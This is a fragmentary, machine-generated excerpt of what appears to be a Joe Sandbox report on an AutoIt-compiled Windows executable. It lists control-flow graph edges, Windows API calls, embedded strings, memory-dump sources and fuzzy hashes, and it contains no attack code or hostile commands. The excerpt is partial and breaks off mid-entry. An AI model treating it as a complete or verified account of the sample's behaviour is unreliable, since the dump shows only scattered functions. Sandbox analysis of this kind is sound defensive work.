7ff7adc62947 286->292 295 7ff7adc6294c-7ff7adc6295b call 7ff7adc831a8 292->295 301 7ff7adc6295d 295->301 304 7ff7adc62962-7ff7adc62971 call 7ff7adc831a8 301->304 311 7ff7adc62973 304->311 311->311 316->278 319 7ff7adc1ebe2-7ff7adc1ebec 316->319 319->286 320 7ff7adc1ebf2-7ff7adc1ec08 call 7ff7adc0a07c 319->320 323 7ff7adc1ec0e-7ff7adc1ec18 320->323 324 7ff7adc1ed20-7ff7adc1ed25 call 7ff7adc24c24 320->324 326 7ff7adc1ec8a-7ff7adc1eca9 call 7ff7adc0a07c call 7ff7adc24c24 323->326 327 7ff7adc1ec1a-7ff7adc1ec24 323->327 324->190 338 7ff7adc1ecab 326->338 327->295 328 7ff7adc1ec2a-7ff7adc1ec3b 327->328 328->304 331 7ff7adc1ec41-7ff7adc1ed71 call 7ff7adc0a07c * 3 call 7ff7adc1ee10 call 7ff7adc1ed8c 328->331 347 7ff7adc1ed77-7ff7adc1ed88 331->347 348 7ff7adc62978-7ff7adc62987 call 7ff7adc8d794 331->348 338->327 351 7ff7adc62989 348->351 351->351
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                          • String ID: close all
                                                                          • API String ID: 1992507300-3243417748
                                                                          • Opcode ID: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                          • Instruction ID: eac179cd931e440ec4bb25761e5ecbef2ea2d26fddb73c1d59d776fa35aa1eba
                                                                          • Opcode Fuzzy Hash: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                          • Instruction Fuzzy Hash: FCE12D26B0E91289EE54FB56C56027CA364FF84B44FD65131DB0E932A1EF3CE8638721

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: AutoIt v3
• API String ID: 423443420-1704141276
• Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
• Instruction ID: fb2494488f24ec98f8f566c721c042944be9359f63e3409351ddd0ae0487cca7
• Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
• Instruction Fuzzy Hash: 2D312736A1AB429EE740EB50E8543A8B7B4FB48B44FC10039C94D03764EF7CE45A8760

Control-flow Graph

[Control-flow graph edge list omitted: basic blocks 7ff7adc47348-7ff7adc47736; API calls CreateFileW, GetFileType, GetLastError, CloseHandle]
APIs
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
• Instruction ID: 223a55949849b7fcbbfe77f280662a1f0e113a2d59e1670da02f01dfd558a46e
• Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
• Instruction Fuzzy Hash: 9DC1F173B29A418AEB54DF64D4483AC7762E7497A8F821235DE1E5B3E4EF38E012C350

Control-flow Graph

[Control-flow graph edge list omitted: basic blocks 7ff7adc125bc-7ff7adc12b2d and 7ff7adc5d148-7ff7adc5e2b5; API calls PeekMessageW, GetInputState, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, timeGetTime]
APIs
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: Message$Peek$DispatchInputStateTimeTranslatetime
• String ID:
• API String ID: 3249950245-0
• Opcode ID: 4e5214824c5420639b9de00f29baad83bafa904f2dd3af1d4c39dffda22c8357
• Instruction ID: fc7ccdd00cd7ac18e02af21d08ff00eb028db5c5d06ef7ff0288612af985b143
• Opcode Fuzzy Hash: 4e5214824c5420639b9de00f29baad83bafa904f2dd3af1d4c39dffda22c8357
• Instruction Fuzzy Hash: 4D229F36A0E7828EFB64AB24D4503B9E7A0FB45B44FD64135DA4E426A5FF3CE446C720

Control-flow Graph

[Control-flow graph: single basic block 7ff7adc03cbc-7ff7adc03d88; API calls CreateWindowExW * 2, ShowWindow * 2]
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: Window$Create$Show
• String ID: AutoIt v3$d$edit
• API String ID: 2813641753-2600919596
• Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
• Instruction ID: 1f88f3a2cb3f06cc2a9657184532823284ce6d6bd297ab8f0a6836a463e02f9a
• Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
• Instruction Fuzzy Hash: 1C218E72A2DB418AE750DB10F8583A9B7A0F788B99F824238D68D46664DF7DD44ACB10

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
• String ID:
• API String ID: 2117695475-0
• Opcode ID: c5af1a2945e0b28d35ed004d247bbfb317608e89d5a488d8119e5cdd6fee6e2c
• Instruction ID: 5af1e205f2ab3d3e0e4ab0ba388e84eda5ade48bb74b2e91136c99f61ff3abd9
• Opcode Fuzzy Hash: c5af1a2945e0b28d35ed004d247bbfb317608e89d5a488d8119e5cdd6fee6e2c
• Instruction Fuzzy Hash: 9F119610E2F2434EFA1873B094562BEE290CFA4701FD60538E91D9A2E3FD5DA9578632

Control-flow Graph

APIs
  • Part of subcall function 00007FF7ADC22D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7ADC07FA5), ref: 00007FF7ADC22D8E
  • Part of subcall function 00007FF7ADC22D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7ADC07FA5), ref: 00007FF7ADC22D9C
  • Part of subcall function 00007FF7ADC22D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7ADC07FA5), ref: 00007FF7ADC22DAC
  • Part of subcall function 00007FF7ADC22D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7ADC07FA5), ref: 00007FF7ADC22DBC
  • Part of subcall function 00007FF7ADC22D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7ADC07FA5), ref: 00007FF7ADC22DCA
  • Part of subcall function 00007FF7ADC22D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7ADC07FA5), ref: 00007FF7ADC22DD8
  • Part of subcall function 00007FF7ADC1EEC8: RegisterWindowMessageW.USER32 ref: 00007FF7ADC1EF76
• GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC0106D), ref: 00007FF7ADC08209
• OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC0106D), ref: 00007FF7ADC0828F
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC0106D), ref: 00007FF7ADC4D36A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID: AutoIt
• API String ID: 1986988660-2515660138
• Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
• Instruction ID: cf05697187c5f3f344de7d96f5f9b9fd4cb61d4b66649aeeff9eec30152ece5e
• Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
• Instruction Fuzzy Hash: 5EC1E72291EB42ADE640BB14AC612F4F7A4FF98B40FD20236D44C42671FF7CA946DB60
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: IconLoadNotifyShell_Stringwcscpy
• String ID: Line:
• API String ID: 3135491444-1585850449
• Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
• Instruction ID: f2eae5c9dbb4d30690d7139d6fbafac883d478dca51cead9c67d773f26c622d9
• Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
• Instruction Fuzzy Hash: 7A415362A0E6869EFB24FB10D4502F9A365FB44744FD55031D64C026B9FF7CE94AC760
APIs
• GetOpenFileNameW.COMDLG32 ref: 00007FF7ADC4BAA2
  • Part of subcall function 00007FF7ADC056D4: GetFullPathNameW.KERNEL32(?,00007FF7ADC056C1,?,00007FF7ADC07A0C,?,?,?,00007FF7ADC0109E), ref: 00007FF7ADC056FF
  • Part of subcall function 00007FF7ADC03EB4: GetLongPathNameW.KERNELBASE ref: 00007FF7ADC03ED8
Strings
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
• API String ID: 779396738-2360590182
• Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
• Instruction ID: 0faed880350b3d75add3bbca6e9dac1a446b698d67fa3e6addf6c9c1fff13e94
• Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
• Instruction Fuzzy Hash: BF316F72A0EB8189E710EF21D8441A9B7A4FB49B84FD94135DE8C47765EF3CD646C720
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                          • String ID:
                                                                          • API String ID: 3812282468-0
                                                                          • Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                          • Instruction ID: 615e0e669729b9aa2fe76d73da90c0282b2d4f73705f0e3f78d38e184f803b72
                                                                          • Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                          • Instruction Fuzzy Hash: 5731E722A0E7C28BE761AB1190402BDB758E744FC4FD95032DE4C07766EE2CD646CB60
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7ADC06F52,?,?,?,?,?,?,00007FF7ADC0782C), ref: 00007FF7ADC06FA5
                                                                          • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7ADC06F52,?,?,?,?,?,?,00007FF7ADC0782C), ref: 00007FF7ADC06FD3
                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF7ADC06F52,?,?,?,?,?,?,00007FF7ADC0782C), ref: 00007FF7ADC06FFA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3677997916-0
                                                                          • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                          • Instruction ID: be6cdcf6a73f15477bccb7af2ca52c5fce057ab361a6972fb305a2807bb3c160
                                                                          • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                          • Instruction Fuzzy Hash: 9621AC32A1D7518BD7509F15E440A6EB3A4FB48B84FC55130EB8D83B24EF39E4068B00
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                          • Instruction ID: a79779904a5ec2acc1f9d1274cffdfb1c5569e400aa83073f70d64c8bc924825
                                                                          • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                          • Instruction Fuzzy Hash: F6E01220F5E3018AEB457B615C86279A362DF48741FC25438C80E023A2FD3DE40A8220
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Init_thread_footer
                                                                          • String ID: CALL
                                                                          • API String ID: 1385522511-4196123274
                                                                          • Opcode ID: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
                                                                          • Instruction ID: 490ec864f974cac118f1e18eb9d3a1251be29793c4e02461bcfa8865d101cc11
                                                                          • Opcode Fuzzy Hash: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
                                                                          • Instruction Fuzzy Hash: 51225B72A0E6528EEB10EF65D0403ACA7A1FB44B88FD24136DB5D577A5EF38E446C360
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                          • Instruction ID: 340c2deb38c2083815e795a9be70a5dd9c52d26c911ecd9e75074254641ccc28
                                                                          • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                          • Instruction Fuzzy Hash: 5841917294E6428BF760AF10E418339B7A1EB45BA8FD64330DA6D0B6E5EF3DD4068750
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressFreeProc
                                                                          • String ID:
                                                                          • API String ID: 2632591731-0
                                                                          • Opcode ID: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                          • Instruction ID: 770eb30611fef371b93210f8b8964a45e8383cbe993e2edcc577cc97b3f9c67a
                                                                          • Opcode Fuzzy Hash: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                          • Instruction Fuzzy Hash: 79416422B1AA129EEB10EF25D4553BCA3A0EB4478CFC64131EA0D476A9EF3CD546C760
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_
                                                                          • String ID:
                                                                          • API String ID: 1144537725-0
                                                                          • Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                          • Instruction ID: 68dc8a7711b092b10d52a65a3e3dabc55d5eba8399518c9e51440789f36f981f
                                                                          • Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                          • Instruction Fuzzy Hash: B8419F7290EB458AE751AF11E4443A8B7A8FB48B98FC50035DE4C073A8EF7CD546C760
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7ADC3A2E2), ref: 00007FF7ADC43EB0
                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7ADC3A2E2), ref: 00007FF7ADC43F15
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free
                                                                          • String ID:
                                                                          • API String ID: 3328510275-0
                                                                          • Opcode ID: 16a7ac5b8830e35db6f9156b9abe62843fc22596b2181d25e1a7d5c24141830d
                                                                          • Instruction ID: 64bf34c860e5e75c2aa70c7a8cd3ebdbd1592b784011a87b60bd3bfa48919515
                                                                          • Opcode Fuzzy Hash: 16a7ac5b8830e35db6f9156b9abe62843fc22596b2181d25e1a7d5c24141830d
